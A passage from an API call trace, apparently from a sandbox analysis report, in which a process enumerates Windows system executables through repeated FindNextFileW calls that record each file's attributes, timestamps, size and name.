(in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bac1369, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2bac1369, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2bac1369, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="rekeywiz.exe", cAlternateFileName="")) returned 1 [0107.997] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa36e9f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa36e9f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa36e9f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="relog.exe", cAlternateFileName="")) returned 1 [0107.998] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28f182fa, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28f182fa, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28f182fa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="replace.exe", cAlternateFileName="")) returned 1 [0107.998] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29b9c869, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29b9c869, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29b9c869, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1aa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="resmon.exe", cAlternateFileName="")) returned 1 [0107.998] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ac4cf7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ac4cf7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ac4cf7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x85000, dwReserved0=0x0, dwReserved1=0x0, cFileName="RMActivate.exe", cAlternateFileName="")) returned 1 [0107.998] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ba9b10f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ba9b10f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ba9b10f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x89c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="RMActivate_isv.exe", cAlternateFileName="")) returned 1 [0107.998] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b91d98a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2b91d98a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2b91d98a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x76200, dwReserved0=0x0, dwReserved1=0x0, cFileName="RMActivate_ssp.exe", cAlternateFileName="")) returned 1 [0107.998] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ba9b10f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ba9b10f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ba9b10f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x76400, dwReserved0=0x0, dwReserved1=0x0, cFileName="RMActivate_ssp_isv.exe", cAlternateFileName="")) returned 1 [0107.999] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dc0dd0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28dc0dd0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28dc0dd0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="RmClient.exe", cAlternateFileName="")) returned 1 [0107.999] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a9ea9ee, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2a9ea9ee, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2a9ea9ee, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Robocopy.exe", cAlternateFileName="")) returned 1 [0107.999] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e66a3d4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2e66a3d4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2e66a3d4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ROUTE.EXE", cAlternateFileName="")) returned 1 [0107.999] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aaf5a5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aaf5a5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aaf5a5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6600, dwReserved0=0x0, dwReserved1=0x0, cFileName="RpcPing.exe", cAlternateFileName="")) returned 1 [0107.999] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4fa796, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xd4fa796, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xd4fa796, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9800, dwReserved0=0x0, dwReserved1=0x0, cFileName="rrinstaller.exe", cAlternateFileName="")) returned 1 [0107.999] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28ecbe41, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28ecbe41, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28ecbe41, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4600, dwReserved0=0x0, dwReserved1=0x0, cFileName="runas.exe", cAlternateFileName="")) returned 1 [0107.999] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x316193ba, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x316193ba, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x316193ba, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd200, dwReserved0=0x0, dwReserved1=0x0, cFileName="rundll32.exe", cAlternateFileName="")) returned 1 [0107.999] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3235c4d6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3235c4d6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3235c4d6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe800, dwReserved0=0x0, dwReserved1=0x0, cFileName="RunLegacyCPLElevated.exe", cAlternateFileName="")) returned 1 [0107.999] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e1a58a8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2e1a58a8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2e1cbb1e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9000, dwReserved0=0x0, dwReserved1=0x0, cFileName="runonce.exe", cAlternateFileName="")) returned 1 [0108.000] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29d40238, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29d40238, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29d40238, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xea00, dwReserved0=0x0, dwReserved1=0x0, cFileName="sc.exe", cAlternateFileName="")) returned 1 [0108.000] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28352954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28352954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28352954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2da00, dwReserved0=0x0, dwReserved1=0x0, cFileName="schtasks.exe", cAlternateFileName="")) returned 1 [0108.000] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28e0d281, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28e0d281, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28e0d281, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5600, dwReserved0=0x0, dwReserved1=0x0, cFileName="sdbinst.exe", cAlternateFileName="")) returned 1 [0108.000] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5faaf16e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5faaf16e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5faaf16e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa200, dwReserved0=0x0, dwReserved1=0x0, cFileName="sdchange.exe", cAlternateFileName="")) returned 1 [0108.000] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fe41bc5, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2fe41bc5, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2fe41bc5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5800, dwReserved0=0x0, dwReserved1=0x0, cFileName="sdiagnhost.exe", cAlternateFileName="")) returned 1 [0108.000] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e47a547, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2e47a547, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2e47a547, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="SearchFilterHost.exe", cAlternateFileName="")) returned 1 [0108.000] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e4a07a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2e4a07a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2e4a07a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb9800, dwReserved0=0x0, dwReserved1=0x0, cFileName="SearchIndexer.exe", cAlternateFileName="")) returned 1 [0108.001] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e47a547, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2e47a547, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2e47a547, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45000, dwReserved0=0x0, dwReserved1=0x0, cFileName="SearchProtocolHost.exe", cAlternateFileName="")) returned 1 [0108.001] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b9dc54e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2b9dc54e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2b9dc54e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9400, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecEdit.exe", cAlternateFileName="")) returned 1 [0108.001] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29db2940, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29db2940, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29db2940, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="secinit.exe", cAlternateFileName="")) returned 1 [0108.001] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cb71a8e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2cb71a8e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2cb71a8e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f200, dwReserved0=0x0, dwReserved1=0x0, cFileName="sethc.exe", cAlternateFileName="")) returned 1 [0108.001] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e2b0915, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2e2b0915, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2e2b0915, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x71b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="SettingSyncHost.exe", cAlternateFileName="")) returned 1 [0108.001] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29d40238, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29d40238, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29d40238, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6600, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup16.exe", cAlternateFileName="")) returned 1 [0108.001] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a9ea9ee, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2a9ea9ee, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2a9ea9ee, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="setupugc.exe", cAlternateFileName="")) returned 1 [0108.001] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xba00, dwReserved0=0x0, dwReserved1=0x0, cFileName="setx.exe", cAlternateFileName="")) returned 1 [0108.001] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29f09e63, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29f09e63, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29f09e63, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9000, dwReserved0=0x0, dwReserved1=0x0, cFileName="sfc.exe", cAlternateFileName="")) returned 1 [0108.002] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28293da3, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28293da3, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28293da3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x60600, dwReserved0=0x0, dwReserved1=0x0, cFileName="shrpubw.exe", cAlternateFileName="")) returned 1 [0108.002] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ba28a07, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ba28a07, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ba28a07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8400, dwReserved0=0x0, dwReserved1=0x0, cFileName="shutdown.exe", cAlternateFileName="")) returned 1 [0108.002] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51fa337f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x51fa337f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x51fa337f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmartScreenSettings.exe", cAlternateFileName="")) returned 1 [0108.002] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ff269e0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ff269e0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ff269e0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x33d30, dwReserved0=0x0, dwReserved1=0x0, cFileName="SndVol.exe", cAlternateFileName="")) returned 1 [0108.002] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x284a9e8e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x284a9e8e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x284a9e8e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x0, dwReserved1=0x0, cFileName="sort.exe", cAlternateFileName="")) returned 1 [0108.002] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62df19bc, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x62df19bc, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x62df19bc, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="srdelayed.exe", cAlternateFileName="")) returned 1 [0108.002] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28f182fa, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28f182fa, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28f182fa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="subst.exe", cAlternateFileName="")) returned 1 [0108.003] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a9ea9ee, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2a9ea9ee, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2a9ea9ee, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9188, dwReserved0=0x0, dwReserved1=0x0, cFileName="svchost.exe", cAlternateFileName="")) returned 1 [0108.003] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28ea5bef, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28ea5bef, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28ea5bef, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7400, dwReserved0=0x0, dwReserved1=0x0, cFileName="sxstrace.exe", cAlternateFileName="")) returned 1 [0108.003] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f420563, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f420563, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f420563, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa000, dwReserved0=0x0, dwReserved1=0x0, cFileName="SyncHost.exe", cAlternateFileName="")) returned 1 [0108.003] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ac4cf7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ac4cf7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ac4cf7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="syskey.exe", cAlternateFileName="")) returned 1 [0108.003] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x334590af, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x334590af, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x334590af, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13400, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo.exe", cAlternateFileName="")) returned 1 [0108.003] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3233627b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3233627b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3233627b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14400, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemPropertiesAdvanced.exe", cAlternateFileName="")) returned 1 [0108.003] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3155a7fa, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3155a7fa, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3155a7fa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14400, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemPropertiesComputerName.exe", cAlternateFileName="")) returned 1 [0108.003] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3153459f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3153459f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3153459f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14400, dwReserved0=0x0, dwReserved1=0x0, 